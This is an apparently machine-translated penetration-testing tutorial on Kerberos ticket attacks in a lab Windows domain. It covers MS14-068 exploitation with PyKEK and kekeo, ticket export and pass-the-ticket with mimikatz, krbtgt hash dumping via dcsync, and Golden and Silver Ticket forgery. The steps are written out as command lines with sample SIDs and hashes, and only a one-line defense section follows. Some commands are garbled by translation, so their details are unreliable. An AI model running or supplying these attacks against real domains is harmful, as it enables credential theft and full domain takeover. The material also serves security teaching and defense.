Domain penetration -- Pass The Ticket

Domain penetration -- Pass The Ticket
0x00 Preface

The previous article introduced The Pass The Hash and Pass The Key skills. Next, I will introduce The Pass The Ticket

0x01 Introduction

In the domain environment, Kerberos is used for identity authentication, as shown in a simple identity authentication process. For details, refer to the relevant materials. Here are only a few terms:

KDC (Key Distribution Center): Key Distribution Center, which contains two services: AS and tgs as (Authentication Server): Identity Authentication Service TGS (Ticket Granting Server ): ticket Granting service TGT (Ticket Granting Ticket): The Ticket authorized by The identity authentication service for identity authentication, stored in memory, The default validity period is 10 hours Pass The Ticket: if we can get the user's TGT and import it To the memory, we can impersonate the user to get its access permissions.

After learning about related terms, we will introduce The technologies related to Pass The Ticket from The perspective of actual use.

Test environment:

1 2 3 4 5 6 7 domain control: OS: server 2008 r2 x64 ip: 192.168.40.132 domain host: OS: win7 x64 ip: 192.168.40.225 0x02 MS14-068

Today, the vulnerability has been detected for more than a year, and its attack defense detection methods have been very mature. Therefore, we will review its exploitation methods.

1. PyKEK

The first publicly available method is Sylvain monn' PyKEK implemented in Python.

Prerequisites:

Domain Users and their password Domain Users correspond to the sid domain control address Win7 and Above Systems

Tips:

Windows 7 and later are required for the operating system. This is because XP does not support importing Ticket attack hosts and other domain user information, for example, you can use the password and sid of domain user B on host A to convert the Python script into an exe, and then use it on any Windows host.

To exploit the vulnerability, follow these steps:

If the vulnerability is successfully triggered, it is generated. the ccache file uses klist purge to first clear the Ticket in the memory and use the ptc function of mimimikatz. import ccache to memory view imported Ticket using klist to connect to domain control using net use

Tips:

If you do not clear the Ticket in the memory and import it directly, it may fail to connect to the domain controller and use the domain control address instead of the IP address.

2. kekeo

Benjamin DELPY uses c to realize MS14-068 utilization tools, which is simpler and more efficient.

Because the domain user's corresponding sid can be automatically obtained through the program, and the clear import ticket can also be automatically implemented, of course, if you want to use other domain user information to attack, you can also add the sid to manually import the ticket

Kekeo's quick usage only requires the following parameters:

Domain user and its password domain control address

In the actual test, the access permission for domain control is successfully obtained.

:
Https://github.com/gentilkiwi/kekeo/releases

0x03 Export the ticket

After successfully obtaining the domain control permission, we can export the Ticket in the domain control memory, which can be used to renew the domain control within 10 hours by default.

Use mimikatz to export the Ticket in the memory and run the following command:

1 sekurlsa: tickets/export

Save it as a file and export the following files in total,

Select [0; 2d87a] [email protected] and import it on the host of the general user.

Run:

1 mimikatz "kerberos: ptt C: \ test \ [0; 2d87a] [email protected]"

, Imported

 

Check whether you have domain control permissions,

Tips:

The 64-bit system uses the ptt function to use the 32-bit mimikatz. If the 64-bit mimikatz is used, the imported Ticket that cannot be imported in this way takes effect within 10 hours by default.

0x04 Golden Ticket

Every user's Ticket is generated by the krbtgt password Hash. If we get the krbtgt password Hash, can we forge Ticket at will?

In fact, as long as you get the domain control permission, you can easily obtain the Hash value of krbtgt. Then, you can use mimikatz to generate a Ticket with any user permissions, that is, Golden Ticket.

1. Export the krbtgt Hash

Execute on domain control

1 mimikatz log "lsadump: dcsync/domain: test. local/user: krbtgt"

Generate mimikatz. log record output, and use log output to conveniently copy Hash values

:

Find the following information:

1 2 3/domain: test. local/sid: S-1-5-21-4155807533-921486164-2767329826/aes256: Parts 2, generate Golden Ticket

Set the spoofed user to god and execute

1 2 3 mimikatz "kerberos: golden/domain: test. local/sid: S-1-5-21-4155807533-921486164-2767329826/aes256: Role/user: god/ticket: gold. kirbi"

Generate file gold. kirbi

Tips:

To generate a Golden Ticket, you can not only use aes256, but also use the NTLM hash of krbtgt.
You can use mimikatz "lsadump: lsa/patch" to export

Import Golden Ticket and run the following command:

1 kerberos: ptt c: \ test \ gold. kirbi

, The domain control permission is successfully obtained.

Tips:

The imported Ticket takes effect within 20 minutes by default. Of course, if it expires, You can import ptt to Golden Ticket again to forge any user. Even if it does not exist, the NTLM hash of krbtgt will not change easily, even if you modify the domain controller administrator password

0x05 Silver Ticket

Silver Ticket is a forged TGS (Ticket Granting Server) ticket, so it is also called service ticket

Compare it with Golden Ticket:

1. Different Access Permissions

Golden Ticket is a forged TGT (Ticket Granting Ticket), so you can get any Kerberos service permissions.

Silver Ticket is a forged TGS, that is, it has limited scope and can only access specified service permissions.

2. Different encryption methods

Golden Ticket is hash encrypted by krbtgt

Silver Ticket is encrypted by the Service Account (usually a computer account) hash.

3. Different authentication procedures

Golden Ticket must communicate with the domain controller during use.

Silver Ticket does not need to communicate with the domain controller during use.

Silver Ticket:

The normal authentication process is

If Silver Ticket is used, the authentication process changes

Steps 1-4 are canceled.

That is to say, if you have Silver Ticket in your hand, you can skip KDC authentication and directly access the specified service.

For example, you need to access the "cifs" service on the domain controller (the cifs service is used for file sharing between Windows hosts)

Obtain the following information:

/Domain/sid/target: the full name of the domain name of the target server. Here, it is the full name of domain control/service: kerberos service on the target server. Here it is cifs/rc4: NTLM hash of the computer account, computer account/user of the domain Control Host: the user name to be forged. silver test is available here.

 

Run the following command on domain control to obtain the hash of the local administrator account of the domain Control Host:

1 mimikatz log "sekurlsa: logonpasswords"

Note:

Find the computer account, that is, the NTLM hash of Username: WIN-8VVLRPIAJB0 $, which fails if it is another account

Sort out the obtained information as follows:

/Domain: test. local/sid: S-1-5-21-4155807533-921486164-2767329826/target: WIN-8VVLRPIAJB0.test.local/service: cifs/rc4: d5304f9ea69523479560ca4ebb5a2155/user: silver

Use mimikatz to execute the following command to import Silver Ticket

1 mimikatz "kerberos: golden/domain: test. local/sid: S-1-5-21-4155807533-921486164-2767329826/target: WIN-8VVLRPIAJB0.test.local/service: cifs/rc4: d5304f9ea69523479560ca4ebb5a2155/user: silver/ptt"

The file is successfully imported. In this case, you can access the file sharing on the domain controller.

For better understanding, let's take another example.

Access the "LDAP" service on domain control

The information is as follows. You only need to change/service name to LDAP,/user to krbtgt,/rc4 to ntlm hash of krbtgt.

/Domain: test. local/sid: S-1-5-21-4155807533-921486164-2767329826/target: WIN-8VVLRPIAJB0.test.local/service: LDAP/rc4: d5304f9ea69523479560ca4ebb5a2155/user: krbtgt

The command for mimikatz to import Silver Ticket is:

1 mimikatz "kerberos: golden/domain: test. local/sid: S-1-5-21-4155807533-921486164-2767329826/target: WIN-8VVLRPIAJB0.test.local/service: LDAP/rc4: d5304f9ea69523479560ca4ebb5a2155/user: krbtgt/ptt"

At this point dir \ WIN-8VVLRPIAJB0.test.local \ c $ found inaccessible, that is, the aforementioned

Silver Ticket is a forged TGS, that is, it has limited scope and can only access specified service permissions.

, Although the import is successful, the file sharing of domain control cannot be accessed.

However, run the following command to remotely access the LDAP service to obtain krbtgt information:

1 mimikatz "lsadump: dcsync/dc: WIN-8VVLRPIAJB0.test.local/domain: test. local/user: krbtgt"

, Krbtgt account information is obtained remotely.

Of course, there are other services that can be accessed by forging Silver Ticket:

Lists other services available as Silver Ticket:

0x06 defense Domain control updates patches in time monitoring domain control log restrictions mimikatz use 0x07 Summary

This article introduces The technology related to Pass The Ticket, and focuses on some of The actual use cases. No matter The attack and defense, only practice can make progress.

Real knowledge comes from practices.